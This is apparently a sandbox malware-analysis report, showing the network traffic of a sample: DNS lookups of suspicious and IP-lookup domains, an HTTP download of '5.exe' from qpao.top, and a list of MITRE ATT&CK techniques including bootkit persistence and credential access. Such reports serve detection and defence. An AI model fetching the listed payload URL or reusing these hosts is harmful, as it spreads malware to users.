46.173.214.122:80

http://qpao.top/files/penelop/5.exe

http

15.0kB
483.2kB
325
325

HTTP Request

GET http://qpao.top/files/penelop/5.exe

HTTP Response

200
196.216.2.21:43

WHOIS.AFRINIC.NET

198 B
525 B
4
4

8.8.8.8:53

a.kvaka.li

dns

56 B
104 B
1
1

DNS Request

a.kvaka.li

DNS Response

104.18.56.131

104.18.57.131

172.67.194.164
8.8.8.8:53

kvaka.li

dns

54 B
102 B
1
1

DNS Request

kvaka.li

DNS Response

104.18.56.131

104.18.57.131

172.67.194.164
8.8.8.8:53

iplogger.org

dns

58 B
74 B
1
1

DNS Request

iplogger.org

DNS Response

88.99.66.31
8.8.8.8:53

ffdownload.online

dns

63 B
79 B
1
1

DNS Request

ffdownload.online

DNS Response

194.54.83.254
8.8.8.8:53

8d96c6c8686c52e7.xyz

dns

66 B
114 B
1
1

DNS Request

8d96c6c8686c52e7.xyz

DNS Response

172.67.204.197

104.18.42.86

104.18.43.86
8.8.8.8:53

www.ipcode.pw

dns

59 B
181 B
1
1

DNS Request

www.ipcode.pw

DNS Response

0.0.0.0
8.8.8.8:53

www.fddnice.pw

dns

60 B
76 B
1
1

DNS Request

www.fddnice.pw

DNS Response

103.155.92.58
8.8.8.8:53

www.zxfc.pw

dns

57 B
73 B
1
1

DNS Request

www.zxfc.pw

DNS Response

185.104.114.70
8.8.8.8:53

ip-api.com

dns

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

www.facebook.com

dns

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.27.35
8.8.8.8:53

e35654c2a64bf304.club

dns

67 B
115 B
1
1

DNS Request

e35654c2a64bf304.club

DNS Response

104.27.140.60

172.67.209.249

104.27.141.60
8.8.8.8:53

uehge4g6gh.2ihsfa.com

dns

67 B
83 B
1
1

DNS Request

uehge4g6gh.2ihsfa.com

DNS Response

207.246.80.14
8.8.8.8:53

8D96C6C8686C52E7.xyz

dns

66 B
114 B
1
1

DNS Request

8D96C6C8686C52E7.xyz

DNS Response

172.67.204.197

104.18.43.86

104.18.42.86
8.8.8.8:53

hub5pnc.hz.sandai.net

dns

67 B
139 B
1
1

DNS Request

hub5pnc.hz.sandai.net

DNS Response

47.92.100.53

47.92.99.221
8.8.8.8:53

hub5pn.hz.sandai.net

dns

66 B
297 B
1
1

DNS Request

hub5pn.hz.sandai.net

DNS Response

118.212.146.20

118.212.146.21

153.3.232.174

211.91.242.37

58.144.251.1

111.206.4.176

58.144.251.2

211.91.242.38

157.255.225.49

111.206.4.164

157.255.225.53

153.3.232.175
8.8.8.8:53

hub5u.hz.sandai.net

dns

65 B
156 B
1
1

DNS Request

hub5u.hz.sandai.net

DNS Response

39.100.9.39

39.98.57.143

47.92.75.245
8.8.8.8:53

relay.phub.hz.sandai.net

dns

70 B
120 B
1
1

DNS Request

relay.phub.hz.sandai.net
8.8.8.8:53

hub5c.hz.sandai.net

dns

MiniThunderPlatform.exe

1.6kB
3.5kB
24
24

DNS Request

hub5c.hz.sandai.net

DNS Response

140.206.225.138

123.125.221.44

140.206.225.244

123.125.221.6

123.125.221.72

140.206.225.169

DNS Request

pmap.hz.sandai.net

DNS Request

dream.pics

DNS Response

47.97.7.140

DNS Request

hub5idx.shub.hz.sandai.net

DNS Response

8.208.85.95

DNS Request

hubstat.hz.sandai.net

DNS Response

140.206.225.138

140.206.225.169

140.206.225.244

123.125.221.6

123.125.221.72

123.125.221.44

DNS Request

hub5pr.hz.sandai.net

DNS Request

imhub5pr.hz.sandai.net

DNS Request

score.phub.hz.sandai.net

DNS Request

imhub5pr.hz.sandai.net

DNS Request

score.phub.hz.sandai.net

DNS Request

score.phub.hz.sandai.net

DNS Request

imhub5pr.hz.sandai.net

DNS Request

score.phub.hz.sandai.net

DNS Request

imhub5pr.hz.sandai.net

DNS Request

score.phub.hz.sandai.net

DNS Request

score.phub.hz.sandai.net

DNS Request

imhub5pr.hz.sandai.net

DNS Request

imhub5pr.hz.sandai.net

DNS Request

hubstat.hz.sandai.net

DNS Response

47.92.195.246

47.92.169.85

47.92.194.216

47.92.125.145

47.92.39.6

47.92.171.207

DNS Request

hub5p.hz.sandai.net

DNS Request

hub5sr.shub.hz.sandai.net

DNS Response

123.125.221.6

140.206.225.138

123.125.221.72

140.206.225.169

123.125.221.44

140.206.225.244

DNS Request

hub5sr.shub.hz.sandai.net

DNS Response

140.206.225.232

140.206.225.136

DNS Response

47.92.157.216

47.92.74.65

47.92.75.239

DNS Request

hubstat.sandai.net

DNS Response

123.125.221.44

140.206.225.169

140.206.225.244

123.125.221.6

123.125.221.72

140.206.225.138

DNS Response

140.206.225.232

140.206.225.136

DNS Request

hubstat.sandai.net

DNS Response

140.206.225.232

140.206.225.136

DNS Response

140.206.225.232

140.206.225.136
8.8.8.8:53

imhub5pr.hz.sandai.net

dns

68 B
118 B
1
1

DNS Request

imhub5pr.hz.sandai.net
8.8.8.8:53

score.phub.hz.sandai.net

dns

70 B
120 B
1
1

DNS Request

score.phub.hz.sandai.net
8.8.8.8:53

hubstat.hz.sandai.net

dns

67 B
146 B
1
1

DNS Request

hubstat.hz.sandai.net

DNS Response

140.206.225.232

140.206.225.136
8.8.8.8:53

relay.phub.hz.sandai.net

dns

70 B
120 B
1
1

DNS Request

relay.phub.hz.sandai.net
47.92.157.216:80

hub5p.hz.sandai.net

http

MiniThunderPlatform.exe

90 B
38 B
1
1
8.8.8.8:53

hubstat.sandai.net

dns

64 B
121 B
1
1

DNS Request

hubstat.sandai.net

DNS Response

140.206.225.136

140.206.225.232
8.8.8.8:53

naritouzina.net

dns

61 B
77 B
1
1

DNS Request

naritouzina.net

DNS Response

5.61.35.193
8.8.8.8:53

wihumanld.com

dns

59 B
75 B
1
1

DNS Request

wihumanld.com

DNS Response

194.54.80.66
8.8.8.8:53

api.2ip.ua

dns

112 B
144 B
2
2

DNS Request

api.2ip.ua

DNS Response

77.123.139.190

DNS Request

api.2ip.ua

DNS Response

77.123.139.190
8.8.8.8:53

bitbucket.org

dns

59 B
75 B
1
1

DNS Request

bitbucket.org

DNS Response

104.192.141.1
8.8.8.8:53

poolventsystems.com

dns

130 B
162 B
2
2

DNS Request

poolventsystems.com

DNS Request

poolventsystems.com

DNS Response

199.195.250.165

DNS Response

199.195.250.165
8.8.8.8:53

bbuseruploads.s3.amazonaws.com

dns

76 B
113 B
1
1

DNS Request

bbuseruploads.s3.amazonaws.com

DNS Response

52.217.37.52
8.8.8.8:53

kos-games.com

dns

118 B
150 B
2
2

DNS Request

kos-games.com

DNS Request

kos-games.com

DNS Response

185.178.208.165

DNS Response

185.178.208.165
8.8.8.8:53

domain2222.com

dns

60 B
76 B
1
1

DNS Request

domain2222.com

DNS Response

45.153.184.54
8.8.8.8:53

jg5.5aef.pw

dns

114 B
146 B
2
2

DNS Request

jg5.5aef.pw

DNS Request

jg5.5aef.pw

DNS Response

101.99.90.200

DNS Response

101.99.90.200
8.8.8.8:53

microsoft.com

dns

59 B
139 B
1
1

DNS Request

microsoft.com

DNS Response

104.215.148.63

40.76.4.15

40.112.72.205

40.113.200.201

13.77.161.179
8.8.8.8:53

microsoft.com

dns

59 B
113 B
1
1

DNS Request

microsoft.com
8.8.8.8:53

microsoft-com.mail.protection.outlook.com

dns

174 B
206 B
2
2

DNS Request

microsoft-com.mail.protection.outlook.com

DNS Request

microsoft-com.mail.protection.outlook.com

DNS Response

104.47.54.36

DNS Response

104.47.53.36
8.8.8.8:53

qpao.top

dns

108 B
140 B
2
2

DNS Request

qpao.top

DNS Request

qpao.top

DNS Response

46.173.214.122

DNS Response

46.173.214.122
8.8.8.8:53

api.ip.sb

dns

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.12.31

104.26.13.31

172.67.75.172
8.8.8.8:53

www.microsoft.com

dns

63 B
230 B
1
1

DNS Request

www.microsoft.com

DNS Response

80.67.94.7
8.8.8.8:53

www.bing.com

dns

58 B
179 B
1
1

DNS Request

www.bing.com

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

checkip.amazonaws.com

dns

67 B
271 B
1
1

DNS Request

checkip.amazonaws.com

DNS Response

52.204.109.97

34.192.7.28

34.193.115.2

52.20.197.7

18.209.89.50

18.233.3.145

23.21.27.29

3.222.126.94
8.8.8.8:53

whois.iana.org

dns

60 B
110 B
1
1

DNS Request

whois.iana.org

DNS Response

192.0.32.59
8.8.8.8:53

WHOIS.AFRINIC.NET

dns

63 B
138 B
1
1

DNS Request

WHOIS.AFRINIC.NET

DNS Response

196.216.2.21

196.216.2.20

196.192.115.21
47.92.100.53:8000

MiniThunderPlatform.exe

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

T1067

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery